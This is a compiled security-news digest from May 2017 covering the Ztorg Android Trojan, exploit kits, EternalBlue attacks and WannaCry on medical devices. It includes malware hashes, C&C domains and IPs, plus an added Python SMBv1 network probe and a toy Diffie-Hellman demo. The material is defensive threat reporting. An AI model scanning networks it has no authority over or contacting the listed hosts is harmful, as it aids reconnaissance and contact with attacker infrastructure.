data/files/.zog/.ag/ym | ym64 | 807A6CF3857012E41858A5EA8FBA1BEF | Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.aa | mainp.apk/r1 | c27e59f0f943cf7cc2020bda7efb442a | Exploit.AndroidOS.Lotoor.bh
data/files/.zog/.aa | mainp.apk/r2 | 368df668d4b62bdbb73218dd1f470828 | Exploit.AndroidOS.Lotoor.bi
data/files/.zog/.aa | mainp.apk/r3 | fb8449d1142a796ab1c8c1b85c7f6569 | Exploit.AndroidOS.Lotoor.bh
data/files/.zog/.aa | mainp.apk/r4 | 04dd488783dffcfd0fa9bbac00dbf0f9 | Exploit.Linux.Enoket.a
data/files/.zog/.ad | mainmtk.apk | b4b805dc90fa06c9c7e7cce3ab6cd252 | Exploit.AndroidOS.Lotoor.bi
data/files/.zog/.ag/np | np | 1740ae0dc078ff44d9f229dccbd9bf61 | Exploit.Linux.Enoket.a

Most of these files will be downloaded by the Trojan, but some of them can only be dropped from the Trojan body. However, most of the downloaded files are the same as they were seven months ago in September 2016.

Native (ELF) malicious modules

File name | MD5 | Path after infection | Detection name
data/files/.zog/.am | b30c193f98e83b7e6f086bba1e17a9ea | /system/xbin/.gasys | Backdoor.AndroidOS.Ztorg.j
data/files/.zog/.an | 41ab20131f53cbb6a0fb69a143f8bc66 | /system/lib/libgstdsys.so | Backdoor.AndroidOS.Ztorg.j
data/files/.zog/.b | ae822aed22666318c4e01c8bd88ca686 | /system/xbin/.gap.a | Backdoor.AndroidOS.Ztorg.c
data/files/.zog/.k | 5289027ca9d4a4ed4663db445d8fc450 | /system/bin/debuggerd | Backdoor.AndroidOS.Ztorg.c
data/files/.zog/.m | 5af47875666c9207110c17bc8627ce30 | /system/bin/ddexe | script
data/files/.zog/.c | d335ac148f6414f0ce9c30ac63c20482 | /system/xbin/.gap | Backdoor.AndroidOS.Ztorg.c

All of these files can only be dropped from the Trojan’s body. They are not downloaded.

Malicious apps

File name | Name | MD5 | Path after infection | Detection name
data/files/.zog/.l | mains.apk | 87030ae799e72994287c5b37f6675667 | /system/priv-app/dpl.apk | Trojan-Dropper.AndroidOS.Agent.cv
data/files/.zog/.o | mains2.apk | 93016a4a82205910df6d5f629a4466e9 | /system/priv-app/.gmq.apk | Trojan.AndroidOS.Boogr.gsh
data/files/.zog/.n | mainm.apk | 6aad1baf679b42adb55962cdb55fb28c | /system/priv-app/.gma.apk | Backdoor.AndroidOS.Ztorg.a
data/files/.zog/.al | .al | 7d7247b4a2a0e73aaf8cc1b5c6c08221 | /system/priv-app/.gmtgp.apk | Trojan.AndroidOS.Hiddad.c

.gmtgp.apk (7d7247b4a2a0e73aaf8cc1b5c6c08221)

This app is detected as Trojan.AndroidOS.Hiddad.c. It downloads (from the C&C http://api.ddongfg.com/pilot/api/) an additional encrypted module, decrypts and loads it. In my case it downloads Trojan-Clicker.AndroidOS.Gopl.a (af9a75232c83e251dd6ef9cb32c7e2ca).

Its C&C is http://g.ieuik.com/pilot/api/; additional domains are g.uikal.com and api.ddongfg.com.

The Trojan uses accessibility services to install (or even buy) apps from the Google Play Store.


It also downloads apps into the .googleplay_download directory on the SD card and installs them using accessibility services to click buttons. The folder .googleplay_download is one of the sources used to spread the Ztorg Trojan. It can click buttons that use one of 13 languages – English, Spanish, Arabic, Hindi, Indonesian, French, Persian, Russian, Portuguese, Thai, Vietnamese, Turkish and Malay.

dpl.apk (87030AE799E72994287C5B37F6675667)

This module contains the same methods to detect emulators, sandbox and virtual machines as in the original infected module.

It downloads an encrypted file from the C&C api.jigoolng.com/only/gp0303/12.html into the file /.androidsgqmdata/isgqm.jar. After decryption, the Trojan loads this file.

The main purpose of dpl.apk is to download and install apps. It receives commands from the following C&Cs:

log.agoall.com/gkview/info/,
active.agoall.com/gnview/api/,
newuser.agoall.com/oversea_adjust_and_download_write_redis/api/download/,
api.agoall.com/only/

The module downloads them into the DownloadProvider directory on the SD card. This folder is one of the sources used to distribute the Ztorg Trojan.

In my case, it downloaded five malicious APKs; four of them were installed and listed in the Installed apps section.

.gma.apk (6AAD1BAF679B42ADB55962CDB55FB28C)

This Trojan tries to download the additional isgqm.jar module with the main functionality in the same way as the other modules. Unfortunately, its C&Cs (a.gqkao.com/igq/api/, d.oddkc.com/igq/api/, 52.74.240.149/igq/api, api.jigoolng.com/only/) didn’t return any commands, so I don’t know the main purpose of this app.

This app can modify /system/etc/install-recovery.sh, and download files to the /.androidgp/ folder on the SD card. These files will be installed in the system folders (/system/app/ or /system/priv-app/).

I assume this Trojan is needed to update other modules.

.gmq.apk (93016a4a82205910df6d5f629a4466e9)

This Trojan wasn’t able to download its additional module isgq.jar from the C&Cs (a.apaol.com/igq/api, c.oddkc.com/igq/api, 52.74.240.149/igq/api).

Installed apps

The following apps were silently downloaded and installed on the device after infection. All of them have some well-known ad services.

Package name | Detection | MD5 | Ad modules
co.uhi.tadsafa | Trojan-Downloader.AndroidOS.Rootnik.g | d1ffea3d2157ede4dcc029fb2e1c3607 | mobvista, batmobi
com.friend.booster | Trojan.AndroidOS.Ztorg.bo | 5c99758c8622339bffddb83af39b8685 | mobvista, batmobi
sq.bnq.gkq | Trojan-Downloader.AndroidOS.Rootnik.g | 10272af66ab81ec359125628839986ae | mobvista, batmobi
main.ele.com.blood | Trojan.AndroidOS.Ztorg.bo | 8572aec28df317cd840d837e73b2554a | mobvista

They also have malicious modules that start downloading ads and apps when commanded by their C&C.

But using clean advertising networks like Mobvista and Batmobi creates an ad recursion, because these ads were used to distribute the original infected app.

A few new folders appear on the SD card after a successful infection. Among them:

.googleplay_download
.nativedroid
.sysAndroid
DownloadProvider

All of these folders were used by some of the malware to spread the initial Ztorg infection and were used after infection to distribute other apps – some of them malicious.

Other Trojans

Although almost every Trojan found on Google Play during this research carried one of the three malicious modules described above, there were also a few other Trojans.

One of them, called Money Converter (com.countrys.converter.currency, 55366B684CE62AB7954C74269868CD91), had been installed more than 10,000 times from Google Play. Its purpose is similar to that of the .gmtgp.apk module – it uses Accessibility Services to install apps from Google Play. Therefore, the Trojan can silently install and run promoted apps without any interaction with the user, even on updated devices where it cannot gain root rights.


It used the same command and control servers as .gmtgp.apk.

Conclusion

During the research period I found that Trojan.AndroidOS.Ztorg was uploaded to Google Play Store almost 100 times as different apps. The first of them was called Privacy Lock, had more than 1 million installations and was uploaded in mid-December 2015. Every month after I started tracking this Trojan in September 2016 I was able to find and report at least three new infected apps on Google Play. The most recent apps that I found were uploaded in April 2017, but I’m sure there will be more soon.

All of these apps were popular. Furthermore, their popularity grew very fast, with tens of thousands of new users sometimes being infected each day.

I found out that these Trojans were actively distributed through advertising networks. All these malicious campaigns contained the same URL, which allows me to easily track down any new infected apps.

I was surprised that these Trojans were distributed through apps that were paying users for installing promoted apps. It turned out that some users got paid a few US cents for infecting their device, though they didn’t know it was being infected.

Another interesting thing about the distribution of this Trojan is that after infection it used some of the advertising networks to show infected users ads about installing promoted apps. It creates a kind of ad recursion on infected devices – they become infected because of a malicious ad from an advertising network and after infection they see ads from the same advertising network because of the Trojan and its modules.

Cybercriminals were able to publish infected apps on Google Play because of the numerous techniques they used to bypass detection. They continued to develop and use new features in their Trojans all the time. This Trojan has modular architecture and it uses several modules with different functionality and each of them can be updated via the Internet. During infection Ztorg uses several local root exploit packs to gain root rights on a device. Using these rights allows the Trojan to achieve persistence on the device and deliver ads more aggressively.


Terror Exploit Kit Gets Fingerprinting Capabilities

22.5.2017 securityweek Exploit
Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.

Terror was initially detailed in January this year, when security researchers observed that it was targeting vulnerabilities with exploits taken from Metasploit or from either Sundown or Hunter EKs. Terror activity increased last month, after the Sundown EK inexplicably disappeared from the threat landscape.

Previously, the EK was observed carpet bombing victims with many exploits at the same time, even if those exploits didn’t match the targeted browser environment. Now, the threat has added more exploits and is fingerprinting the victim’s system to determine which exploit would be successful based on operating system, patch level, browser version, and installed plugins.

The use of more targeted exploits makes it more difficult for investigators to determine which exploits the toolkit has. However, “it is interesting to note that the adversaries are using a URL parameter in cleartext for the vulnerability they are going to exploit,” Talos says.

Additionally, Talos researchers identified a potentially compromised legitimate web site that appears to be operating as a malware gate. Initially redirecting visitors to a RIG landing page, the gate switched to Terror after a single day.

The compromised website redirects users to the EK landing page by using an HTTP 302 Moved Temporarily response. The page uses obfuscated JavaScript code to evaluate the victim's browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.

More proof that the EK has moved away from its carpet bombing approach is the manner in which it selects exploits when attempting to infect the victim. The researchers were served different files when accessing the site via Internet Explorer 11 than when using Internet Explorer 8.

The EK also uses cookie-based authentication for downloading the exploits, which prevents third-parties from accessing them, the security researchers discovered. This approach prevents not only investigators from learning where from or how the victims were infected, but also stops competitors from stealing the exploits.

“We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving their quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date,” Talos concludes.


Stealth Backdoor Abused NSA Exploit Before WannaCrypt

22.5.2017 securityweek BigBrothers
In the aftermath of the WannaCry ransomware outbreak, security researchers discovered numerous attacks that had been abusing the same EternalBlue exploit for malware delivery over the preceding several weeks.

Targeting a Server Message Block (SMB) vulnerability on TCP port 445, the exploit was made public in April by the group of hackers calling themselves “The Shadow Brokers” and is said to have been stolen from the National Security Agency-linked Equation Group. The targeted flaw was patched in March.

The fast-spreading WannaCry brought EternalBlue to everyone’s attention, yet other malware families had been using it for infection before the ransomware did. One of them was the Adylkuzz botnet, active since April 24, researchers revealed.

Now, Cyphort says that evidence on a honeypot server suggests attacks on SMB were active in early May, and they were dropping a stealth Remote Access Trojan (RAT) instead of ransomware. The malware didn’t have the worm component and didn’t spread like WannaCry.

The malware appears to have been distributed from an IP (182.18.23.38) located in China. Following successful exploitation, an encrypted payload is sent as a shellcode, and the security researchers found a DLL embedded in the shellcode, which they say “is basically a Trojan which downloads additional malware and receives commands from its controller.”

One of the files downloaded by this malware is meant to close port 445, thus preventing other malware from abusing the same flaw. Another file is believed to be a second-stage payload. The RAT sets a series of Registry Run entries to download and execute additional malware, the researchers say.

The malware attempts to delete a number of user accounts and to terminate or delete various processes and files. A memory dump shows that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The RAT can receive and execute commands from the server, monitor the screen, capture audio and video, monitor the keyboard, transfer data, delete files, terminate processes, execute files, enumerate files and processes, download files, and control the machine.

Because the threat closes port 445, Cyphort believes the actor was aware of the EternalBlue vulnerability and was attempting to keep other malware out of the vulnerable machines.

“We believe that the group behind this attack is the same group that spreads Mirai via Windows, which Kaspersky discovered in February. We found similarities in terms of their IOCs,” the security researchers say.

In a report this week, Secdo also claims to have found evidence of malware abusing EternalBlue weeks before WannaCry emerged. One of the malicious programs appears to be a ransomware family that also steals user credentials.

The researchers describe it as a “new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since mid-April.” “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed,” they say.

As part of this attack, the researchers say, the actors used an EternalBlue-based worm to infect all machines in a compromised network, and also deployed a backdoor for persistence or exfiltrated login credentials.

One of the attacks originated from a Russian IP (77.72.84.11). Using the NSA-linked exploit for the initial compromise, the attackers spawned a thread inside a legitimate application and used it to download multiple modules, including an SQLite DLL from SourceForge, to steal login credentials from Firefox.

Stolen data is exfiltrated through the TOR network, after which “a ransomware variant of CRY128 that runs purely in-memory encrypts all the documents on the system,” the researchers say.

The recently discovered UIWIX ransomware that spreads via the EternalBlue exploit is also being executed only in memory, resulting in a fileless infection. UIWIX also contains code meant to steal a broad range of login credentials.

Another attack was linked to a Chinese actor and involved the distribution of a backdoor. The attack starts with process injection, similar to the above, but ends with the download of a known rootkit backdoor (based on Agony). The downloaded file, 666.exe, is blocked by antivirus programs.

“Based on these findings, we suspect that the scope of the damage is much greater than previously thought, and that there are at least 3 different groups that have been leveraging the NSA exploit to infect enterprise networks since late April,” Secdo notes.

In January, the United States Computer Emergency Readiness Team (US-CERT) issued an alert after the Shadow Brokers revealed they had a zero-day exploit targeting SMB up for sale. In February, a Windows SMBv3 zero-day vulnerability (CVE-2017-0016) was assessed with a High severity rating, after initially being believed to be Critical.


North Korea Denies Role in Global Cyberattack

22.5.2017 securityweek Cyber
North Korea on Friday angrily dismissed reports linking its isolated regime to the global cyberattack that held thousands of computers to virtual ransom.

Up to 300,000 computers in 150 countries were hit by the WannaCry worm, which seizes systems and demands payment in Bitcoin to return control to users.

The code used in the latest attack is similar to that used in past hacks blamed on Kim Jong-Un's regime, leading some to point the finger at Pyongyang.

But the North has now denied the claims, notably but not exclusively advanced by South Korean experts, and hit back Friday to accuse its opponents of spreading propaganda.

"It is ridiculous," Kim In-Ryong, North Korea's deputy ambassador to the United Nations, told reporters, suggesting Washington and Seoul were behind the allegation.

"Whenever something strange happens, it is the stereotyped way of the United States and the hostile forces to kick off a noisy anti-DPRK campaign."

Related: WannaCry Doesn't Fit North Korea's Style, Interests, Experts Say

Seoul internet security firm Hauri, known for its vast troves of data on Pyongyang's hacking activities, has been warning of ransomware attacks since last year.

The firm's Simon Choi told AFP that the WannaCry malware shares code with tools used to target Sony Pictures and Bangladesh, in previous attacks blamed on the North.

Researchers in the US, Russia and Israel have also pointed to a potential North Korean link -- but it is notoriously hard to attribute cyberattacks.

Google researcher Neel Mehta has shown similarities between WannaCry and code used by the Lazarus hacking group, widely believed to be connected to Pyongyang.


China Killed or Jailed Up to 20 US Spies in 2010-12: Report

22.5.2017 securityweek CyberSpy
Beijing systematically dismantled CIA spying efforts in China beginning in 2010, killing or jailing more than a dozen covert sources, in a deep setback to US intelligence there, The New York Times reported Sunday.

The Times, quoting 10 current and former American officials who spoke on condition of anonymity, described the intelligence breach as one of the worst in decades.

It said that even now intelligence officials are unsure whether the US was betrayed by a mole within the CIA or whether the Chinese hacked a covert system used by the CIA to communicate with foreign sources.

Of the damage inflicted on what had been one of the most productive US spy networks, however, there was no doubt: at least a dozen CIA sources were killed between late 2010 and the end of 2012, including one who was shot in front of colleagues in a clear warning to anyone else who might be spying, the Times reported.

In all, 18 to 20 CIA sources in China were either killed or imprisoned, according to two former senior American officials quoted. It was a grave setback to a network that, up to then, had been working at its highest level in years.

Those losses were comparable to the number of US assets lost in the Soviet Union and Russia because of the betrayals of two infamous spies, Aldrich Ames and Robert Hanssen, the report said.

Western espionage services have traditionally found it exceptionally hard to develop spy networks in China and Russia.

The CIA's mole hunt in China, following the severe losses to its network there, was intense and urgent. Nearly every employee of the US Embassy in Beijing was scrutinized at one point, the newspaper said.

Meantime, then-president Barack Obama's administration was demanding to know why its flow of intelligence from China had slowed.

The revelations come as the CIA seeks to determine how some of its highly sensitive documents were released two months ago by WikiLeaks, and the FBI examines possible links between the Donald Trump campaign and Russia.

Both the CIA and the FBI declined to comment.


Medical Devices infected by WannaCry Ransomware in US hospitals
21.5.2017 securityaffairs Ransomware

According to Forbes, the dreaded WannaCry ransomware has infected medical devices in at least two hospitals in the United States.
WannaCry infected 200,000 computers across 150 countries in a matter of hours last week. It took advantage of an exploit named EternalBlue, originally developed by the NSA, which targets a vulnerability in earlier versions of Microsoft Windows. The exploit was obtained by a hacking group calling itself “the Shadow Brokers”, which leaked it publicly in April 2017.

Now security experts report that the WannaCry ransomware has also infected medical devices, as reported by Thomas Fox-Brewster on Forbes.

The journalist published an image of an infected medical device, likely Bayer Medrad radiology equipment used to inject contrast agents into the patient to aid MRI scans.

“A source in the healthcare industry passed Forbes an image of an infected Bayer Medrad device in a U.S. hospital. The source did not say which specific hospital was affected, nor could they confirm what Bayer model was hacked. But it appears to be radiology equipment designed to help improve imaging.” states Forbes. “More specifically, it’s a device used for monitoring what’s known in the industry as a “power injector,” which helps deliver a “contrast agent” to a patient. Such agents consist of chemicals that improve the quality of magnetic resonance imaging (MRI) scans.”

WannaCry ransomware on a Bayer radiology system – Source Forbes

The medical device was infected by the WannaCry ransomware because it was running on a version of the Windows Embedded operating system and supporting the SMBv1 protocol.
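Whether a Windows host, embedded or not, still speaks SMBv1 can be checked from the network without touching the device: send an SMB1 Negotiate Protocol request that offers only the NT LM 0.12 dialect and see whether the server answers with an SMB1 header selecting it. The probe below is an added example for this page, not tooling from Bayer, Siemens or Microsoft; the frame layout follows the documented SMB1 header, the flag values are ordinary client defaults chosen for the example, and the response parser is exercised on constructed bytes. A server with SMBv1 disabled typically closes the connection, or in some implementations answers with an SMB2 (\xfeSMB) header; the parser reports both as "no SMBv1".

```python
import socket
import struct

SMB1_NEGOTIATE = 0x72
DIALECTS = [b'NT LM 0.12']   # offer SMB1 only; no "SMB 2.???" so an SMB1 answer is unambiguous


def netbios_frame(msg):
    """Prefix an SMB message with the 4-byte NetBIOS session header."""
    return b'\x00' + struct.pack('>I', len(msg))[1:] + msg


def build_negotiate(dialects=DIALECTS):
    """SMB1 NEGOTIATE request: 32-byte header, WordCount=0, ByteCount,
    then each dialect as 0x02 <name> 0x00."""
    header = (
        b'\xffSMB' + bytes([SMB1_NEGOTIATE])
        + b'\x00' * 4                              # NT status
        + b'\x18'                                  # Flags: canonical paths, case-insensitive
        + struct.pack('<H', 0xc843)                # Flags2: unicode, NT status, ext. security, long names
        + b'\x00' * 2                              # PIDHigh
        + b'\x00' * 8                              # SecurityFeatures
        + b'\x00' * 2                              # Reserved
        + struct.pack('<HHHH', 0, 0xfeff, 0, 0)    # TID, PIDLow, UID, MID
    )
    data = b''.join(b'\x02' + d + b'\x00' for d in dialects)
    return netbios_frame(header + b'\x00' + struct.pack('<H', len(data)) + data)


def parse_negotiate_response(raw, dialects=DIALECTS):
    """Return the dialect the server picked, or None when the reply is not an
    SMB1 NEGOTIATE response (empty read, SMB2 header) or when the DialectIndex
    is 0xFFFF (every offered dialect refused)."""
    msg = raw[4:]                                          # drop NetBIOS header
    if len(msg) < 35 or msg[:4] != b'\xffSMB' or msg[4] != SMB1_NEGOTIATE:
        return None
    if msg[32] == 0:                                       # WordCount 0: no parameter words
        return None
    (index,) = struct.unpack_from('<H', msg, 33)           # first word: DialectIndex
    if index == 0xffff or index >= len(dialects):
        return None
    return dialects[index].decode()


def probe(host, port=445, timeout=3.0):
    """Connect, send the negotiate, return the accepted SMB1 dialect or None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_negotiate())
            return parse_negotiate_response(s.recv(4096))
    except OSError:
        return None


if __name__ == '__main__':
    import sys
    d = probe(sys.argv[1])
    print(f"{sys.argv[1]}: {'SMBv1 accepted (' + d + ')' if d else 'no SMBv1 negotiate response'}")
```

Run it as `python smbv1_probe.py <host>` against devices on the imaging network segment; anything that answers with a dialect is reachable over the protocol the worm uses and should be isolated until it is patched or SMBv1 is disabled.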

The name of the hospital where the device was infected was not disclosed to Forbes; Bayer confirmed it had received two reports from customers in the US.

According to a Bayer spokesperson, the affected hospitals faced limited problems.

“Operations at both sites were restored within 24 hours,” said the spokesperson. “If a hospital’s network is compromised, this may affect Bayer’s Windows-based devices connected to that network.”

Bayer plans to send out a Microsoft patch for its Windows-based devices “soon.”

According to Forbes, a source with the Health Information Trust Alliance (HITRUST) confirmed that WannaCry ransomware also infected and locked down Windows-based medical devices belonging to Siemens.

Siemens admitted that Healthineers products are vulnerable to WannaCry.

“Siemens Healthineers recognizes that some of its customers may be facing impacts from the recent major cyber-attack known as “WannaCry”.” reads the advisory published by Siemens. “Select Siemens Healthineers products may be affected by the Microsoft vulnerability being exploited by the WannaCry ransomware. The exploitability of any such vulnerability depends on the actual configuration and deployment environment of each product.”

Ransomware is a serious threat to the healthcare industry: malware of this kind can lock up hospital systems, preventing staff from using medical equipment and disrupting ordinary operations such as managing patient data or treatment schedules.

WannaCry affected 40 hospitals in the UK. Let’s hope operators in the healthcare industry now understand how important cyber security is for their sector.


Stegano Exploit Kit now uses the Diffie-Hellman Algorithm
21.5.2017 securityaffairs Exploit

The Stegano exploit kit, also known as Astrum, continues to evolve, recently its authors adopted the Diffie-Hellman algorithm to hinder analysis.
The Stegano exploit kit was associated in the past with the massive AdGholas malvertising campaign, which delivered malware, mostly the Gozi and RAMNIT trojans. Experts at Trend Micro also observed the exploit kit in the Seamless malvertising campaign.

“Astrum’s recent activities feature several upgrades and show how it’s starting to move away from the more established malware mentioned above. It appears these changes were done to lay the groundwork for future campaigns, and possibly to broaden its use. With a modus operandi that deters analysis and forensics by abusing the Diffie-Hellman key exchange, it appears Astrum is throwing down the gauntlet.” reads the analysis published by Trend Micro.


In March, the French researcher Kafeine reported the Stegano EK exploiting the information disclosure vulnerability tracked as CVE-2017-0022. The attackers exploited the flaw to evade antivirus detection and analysis.

A month later, the Stegano exploit kit was updated to prevent security researchers from replaying the malicious network traffic.

“We found that this anti-replay feature was designed to abuse the Diffie-Hellman key exchange—a widely used algorithm for encrypting and securing network protocols. Angler was first observed doing this back in 2015.” continues the analysis.

“Implementing the Diffie-Hellman key exchange prevents malware analysts and security researchers from getting a hold of the secret key Astrum uses to encrypt and decrypt their payloads. Consequently, obtaining the original payload by solely capturing its network traffic can be very difficult.”
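Why an ephemeral Diffie-Hellman exchange defeats traffic replay is easier to see in code. The snippet below is an added illustration for this page; it is not Astrum's JavaScript and not Trend Micro's analysis code. It models the landing-page script (victim browser) and the EK server agreeing on a key, with the server returning a payload encrypted under it. The group is a roughly 96-bit safe prime found at import time so the arithmetic stays fast (real use needs a standard 2048-bit group or an elliptic curve), the XOR keystream is a toy stand-in for whatever symmetric cipher the kit really applies, and all function names are this example's own. Two things it makes concrete: a pcap holds only the two public values and the ciphertext, so the payload comes back only if the browser's private exponent is taken from inside the browser (by instrumenting the script as it runs); and a second visit yields a different ciphertext for the same payload, so the captured request cannot simply be replayed against the server.

```python
import hashlib
import secrets


def _is_probable_prime(n, rounds=16):
    """Miller-Rabin; adequate for picking demo parameters."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def safe_prime(bits):
    """Smallest safe prime p = 2q + 1 with q of the given size (deterministic start)."""
    q = (1 << (bits - 1)) | 1
    while not (_is_probable_prime(q) and _is_probable_prime(2 * q + 1)):
        q += 2
    return 2 * q + 1


# Demo group only: far too small for real use, chosen so the search is instant.
P = safe_prime(96)
Q = (P - 1) // 2
G = 4                      # a square, so it generates the prime-order-q subgroup


def keystream_xor(key, data):
    """Toy stream cipher standing in for the kit's symmetric layer:
    XOR data with SHA-256(key || block counter)."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hashlib.sha256(key + (i // 32).to_bytes(4, 'big')).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)


def derive_key(shared_secret):
    return hashlib.sha256(shared_secret.to_bytes((P.bit_length() + 7) // 8, 'big')).digest()


class Party:
    """One side of the exchange. `priv` is fresh per visit and never sent;
    `pub` is the only value that appears on the wire."""
    def __init__(self):
        self.priv = secrets.randbelow(Q - 1) + 1
        self.pub = pow(G, self.priv, P)

    def shared_key(self, other_pub):
        return derive_key(pow(other_pub, self.priv, P))


def exchange(payload):
    """Browser and EK server agree on a key; the server sends the payload
    encrypted under it. Returns what a passive capture contains, plus the
    browser's private exponent separately (a capture never contains it)."""
    browser, server = Party(), Party()
    key = server.shared_key(browser.pub)
    assert key == browser.shared_key(server.pub)
    capture = {'browser_pub': browser.pub, 'server_pub': server.pub,
               'ciphertext': keystream_xor(key, payload)}
    return capture, browser.priv


def decrypt_from_capture(capture, browser_priv=None):
    """Capture alone: nothing to derive a key from. With the browser's exponent
    (taken from the running script, not from the pcap) the payload is recovered."""
    if browser_priv is None:
        return None
    key = derive_key(pow(capture['server_pub'], browser_priv, P))
    return keystream_xor(key, capture['ciphertext'])


if __name__ == '__main__':
    payload = b'constructed second-stage bytes'
    cap, priv = exchange(payload)
    print('from capture only:', decrypt_from_capture(cap))
    print('with browser exponent:', decrypt_from_capture(cap, priv))
    cap2, _ = exchange(payload)
    print('same payload on a second visit, same ciphertext?',
          cap['ciphertext'] == cap2['ciphertext'])
```

In practice this is why analysts working Astrum traffic hook the landing-page JavaScript in an instrumented browser and log the exponent (or the derived key) at the moment it is used, rather than trying to reconstruct the payload from a capture afterwards.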

According to the experts, the Astrum/Stegano exploit kit includes exploit code for a number of vulnerabilities in Adobe Flash, including the CVE-2015-8651 and CVE-2016-1019 remote code execution flaws and the out-of-bounds read bug tracked as CVE-2016-4117.

Experts highlighted that the Stegano exploit kit is currently not being used to deliver malware and that the associated traffic is very low; both circumstances suggest a spike in its activity could be observed soon.

“It wouldn’t be a surprise if [Astrum/Stegano’s] operators turn it into an exclusive tool of the trade—like Magnitude and Neutrino did—or go beyond leveraging security flaws in Adobe Flash. Emulating capabilities from its predecessors such as fileless infections that can fingerprint its targets and deliver encrypted payloads shouldn’t be far off,” concluded Trend Micro.


Researchers found a link between the APT3 Threat Group and the Chinese Intelligence Agency
21.5.2017 securityaffairs  APT

Security experts at threat intelligence firm Recorded Future have found a clear link between the APT3 cyber threat group and China’s Ministry of State Security.
The curtain has been pulled back a little on the Chinese Intelligence Agency intelligence gathering structure — and it includes private security contractors and the network vendor supply chain.

In 2010, security vendor FireEye identified the Pirpi Remote Access Trojan (RAT), which exploited a then-unpatched zero-day vulnerability in Internet Explorer versions 6, 7 and 8. FireEye named the threat group APT3, which has also been described as TG-0100, Buckeye, Gothic Panda and UPS, and described it as “one of the most sophisticated threat groups” being tracked at the time.

Since then, APT3 has been actively penetrating corporations and governments in the US, the UK and, most recently, Hong Kong, and everyone has been trying to figure out who they are. APT3 operates very differently from 3PLA, the former Chinese military hacking organization, which led to the assumption that APT3 is not part of the military complex, at least not officially.

On May 9th, 2017, an unknown party using the alias ‘intrusiontruth’ published a series of blogs posts describing connections between the Pirpi RAT command and control components and shareholders of the Chinese security contractor Guangzhou Boyu Information Technology Company, aka Boyusec.

“On May 9, a mysterious group calling itself “intrusiontruth” identified a contractor for the Chinese Ministry of State Security (MSS) as the group behind the APT3 cyber intrusions,” states the analysis published by Recorded Future.

The names of two specific shareholders of Boyusec appear in the domain registration for the Pirpi C&C servers. This is particularly interesting because Boyusec supports the Chinese Ministry of State Security (MSS) by collecting civilian human intelligence. Think of them as an outsourcer for a government agency like the United States’ National Security Agency (NSA).

Also interesting is that in 2016 a Pentagon report described the relationship between Boyusec and network equipment manufacturer, Huawei. According to the report, the two companies were colluding to develop security equipment with embedded backdoors which would likely be used by Boyusec to compromise Huawei customers.

“In November 2016, the Washington Free Beacon reported that a Pentagon internal intelligence report had exposed a product that Boyusec and Huawei were jointly producing.” continues the analysis. “According to the Pentagon’s report, the two companies were working together to produce security products, likely containing a backdoor, that would allow Chinese intelligence “to capture data and control computer and telecommunications equipment.” The article quotes government officials and analysts stating that Boyusec and the MSS are “closely connected,” and that Boyusec appears to be a cover company for the MSS.”

To protect our networks, it is important to assess the threats. An important part of threat assessment is to anticipate the motivation of the attackers. APT3 has demonstrated above average skills and has been active for a long time. Add ties to the network vendor supply chain and you have the makings of a dangerous adversary. As part of the Chinese MSS structure you can start to guess at motivation. With this new information, it is a good time to reassess your threat model.


“The implications are clear and expansive. Recorded Future’s research leads us to attribute APT3 to the Chinese Ministry of State Security and Boyusec with a high degree of confidence. Boyusec has a documented history of producing malicious technology and working with the Chinese intelligence services,” concludes the analysis.


Google Adds New Behavior-Based Malware Scanner To Every Android Device
20.5.2017 thehackernews Android
In order to keep its billions of users safe, Google has introduced another security defense for its Android devices, called Google Play Protect.
Google Play Protect, which is part of the Google Play Store app, uses machine learning and app usage analysis to weed out dangerous and malicious apps, which have always been an albatross around the tech giant's neck.
Since Google Play Protect actually comes with the Google Play Store, users do not need to install or activate this security feature separately.
Google Play Protect for Android devices consists of:
App scanning
Anti-Theft Measures
Browser Protection
Play Protect's App Scanning Feature
Google Play Protect is an always-on service that is said to scan 50 billion apps each day across a billion Android devices to ensure they are safe.
Google already has a number of security measures in place to help keep your smartphones safe, including Verify Apps and its Bouncer service, but once apps are uploaded to the Play Store and installed on your device, Google does not have anything in place to monitor the behavior of those apps – something that most malware apps were abusing.
Running automatically in the background, Google Play Protect is actually built into devices, which will not only analyse apps before appearing on the Play Store, but also monitor them once installed on the device, including apps that have been installed from third-party stores as well.
For this, Google uses machine learning algorithms that automatically compare app behavior and single out apps acting abnormally; if it encounters a malicious app, it warns you or even disables the app to prevent further harm.
Google says it works around the clock to keep up with the latest threats
Google says the new machine learning system regularly updates to help Android ecosystem stay one step ahead of any potential threats by always looking out for "new risks, identifying potentially harmful apps and keeping them off your device or removing them."
Play Protect's Anti-Theft Measures
With the introduction of Google Play Protect, Android Device Manager has been replaced by Find My Device, which is used to locate lost and misplaced devices.
You can use the browser or any other device to remotely call, locate, and lock, your Android device or even erase the data to protect sensitive information remotely.
Find My Device is the same old solution, but Google included it into the Google Play Protect program.
Play Protect's Browser Protection
With the Safe Browsing feature in Chrome, Play Protect helps users stay safe while browsing the Internet.
Viruses, malware and worms commonly land on smartphones and computers through malicious websites. If you visit a website that is behaving suspiciously, the Safe Browsing feature will warn you and block sites that look unsafe.
Google Play Protect service will be rolling out to Android devices over the coming weeks.


More Hacking Groups Found Exploiting SMB Flaw Weeks Before WannaCry
20.5.2017 thehackernews BigBrothers

